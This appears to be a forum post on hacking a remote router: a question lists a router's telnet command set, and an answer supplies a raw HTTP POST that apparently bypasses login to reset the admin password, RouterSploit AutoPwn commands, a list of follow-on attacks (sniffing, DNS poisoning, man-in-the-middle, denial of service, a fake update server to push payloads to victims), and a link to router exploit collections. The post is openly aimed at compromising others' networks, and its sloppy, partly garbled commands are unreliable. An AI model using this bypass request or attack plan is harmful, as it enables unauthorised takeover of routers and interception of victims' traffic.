hack router by lollhosh

1. what to do with access to remote router?
2. So let's assume there is access to a remote router and that it is possible to TELNET him. List of supported commands are:
3.  
4. list of supported commands :
5. ? | exit | help
6. exec < iwconfig | iwpriv | iwgetid | iwspy | iwlist | iptables | ifconfig >
7. exec < route | netstat | arp | nslookup | vconfig | switch | ping >
8. exec < hostname | ps | killall | kill | top | free | reboot | lsmod >
9. exec < insmod | rmmod | cat | ls | head | tail | umount | mount | mkdir >
10. exec < rm | proc >
11. flash < default >
12. all <sample>
13. get <mib_name>
14. set <mib_name>[ <value>]
15. lan < status >
16. addr <ip-address> | ?
17. dhcp < ? | status | on | off >
18. client [start_ip <end_ip>]
19. slease < ? | status | clearall >
20. add <mac_addr> <ip_addr>
21. del [id]
22. iptv < ? | status | disable >
23. direct < 1 | 2 | 3 | 4 | 3+4 >
24. vlan < 1 | 2 | 3 | 4 | 3+4 >
25. voip < ? | status | disable | enable >
26. route < ? | status >
27. add <dest_addr|default> <gateway> [<metric>]
28. del <host addr|default>
29. nat < ? | status | clearall >
30. add <ip addr> <server> [bcast] [protocol <from port [to port] [d...
31. del <id>
32. sys < atsh | status | reload | delayed | commit | reboot | log | diag >
33. sys < ports >
34. mode < ? | status | gateway | wisp | ap >
35. update <0:disabled|1:enabled>
36. apply [bridge|wan]
37. manage
38. access
39. web <?|0:disabled|1:enabled> [port]
40. icmp <?|0:disabled|1:enabled>
41. telnet <?|0:disabled|1:enabled> [port]
42. ping <domain_name|ip-address>
43. nslookup <domain_name>
44. password <password>
45. service
46. webface < status | start | stop >
47. wan < status | none >
48. link < ? | status >
49. clone < ? | status | default | <mac-addr> | <ip-addr> >
50. dns < ? | status | auto >
51. manual [server-1 [server-2 [server-3]]]
52. static <?|[ip_addr <netmask> <gateway>]>
53. dhcp < ? | status | on | release | renew >
54. 802.1x < ? | status | disable >
55. md5 <user name> <password>
56. chap <user name> <password>
57. mschap <user name> <password>
58. mschap2 <user name> <password>
59. peap-mschap2 <user name> <password>
60. upnp < ? | status | enable | disable >
61. sroute < ? | status | enable | disable | clearall >
62. add <ip-address> <subnet mask> <gateway>
63. del <id>
64. ppp < none | connect | disconnect | start | stop >
65. pppoe <service> <user> <password> <auth> <mppe> <mtu> [dynamic | s...
66. pptp <service> <user> <password> <auth> <mppe> <mtu> [dynamic | s...
67. l2tp <service> <user> <password> <auth> <mppe> <mtu> [dynamic | s...
68. reinit < ? | status | enable | disable >
69. wlan < status | ssid | rate | channel | clients | survey >
70. enable < ? | status | on | off >
71. band < ? | b | g | bg | n | gn | bgn >
72. auth < none >
73. open < wep64 | wep128 >
74. shared < wep64 | wep128 >
75. wpapsk < tkip | aes | tkipaes >
76. wpa2psk < tkip | aes | tkipaes >
77. wpapskwpa2psk < tkip | aes | tkipaes >
78.  
79. What can be done remotely with such commands? Is it possible to sniff traffic or to use the router as a VPN? What would you do? Thanks
80.  
81.  
82. Next we gonna post a HTTP req
83.  
84. Quote:
85. POST http://192.168.1.1:80/tools_admin.php HTTP/1.1
86. Host: 192.168.1.2
87. Keep-Alive: 115
88. Content-Type: application/x-www-form-urlencoded
89. Content-length: 0
90.  
91. ACTION_POST=LOGIN&LOGIN_USER=a&LOGIN_PASSWD=b&login=+Log+In+&NO_NEED_AUTH=1&AUTH_GROUP=0&
92. admin_name=admin&admin_password1=uhOHahEh
93.  
94.  
95. so you are resetting the admin pass with that
96. to enable or to know the telnet logins
97. so what after telnet is your question
98. so its simple
99.  
100. #Sniffing
101. #Dns Poisoning
102. #Network flooding
103. #Hack Network camerasa
104. #Hack DMV server
105. #Network DOS
106. #Corrupting the IP Rooting table
107. #Conducting a MIMT attack
108. #Write Arp-trigger scripts which execute some functions into network if one system calls a particular function
109. #Making a Fake Update server to Fool devices
110. (example is if you know your victim pc has firefox )
111. at the time of start everythime firefoc will check http://www.mozilla.org/en-US/plugincheck/
112. for knowing any updates , you just spoof a *.update.* a wildcard update we are filling wildcard at front and end because to ensure it will be detected what ever plugins system has as you have the telnet access to the router you can do anything with the network .
113. another best thing is.
114. after telnet you can browse system file by just running pwd and ls -a
115. $ cd /var
116. but not more than var directory
117. and you can do lots more but not serious damage.
118.  
119. if you want further access you can exploit it by below steps
120.  
121. <3 Metasploit version for routers is > RouterSploit
122. Just get into Network
123. RouterSploit > use /payload/AutoPwn
124. RouterSploit(AutoPwn) > setg LHOST 192.168.1.1
125. RouterSploit (AutoPwn)> run
126. even there are lots of reversh shell exploits
127. So it fucks your router all available exploits at rtrpwn server>
128.  
129. if you want to exploit using the scripts directly or manually
130. you can download exploits for router from here
131. http://www.routerpwn.com/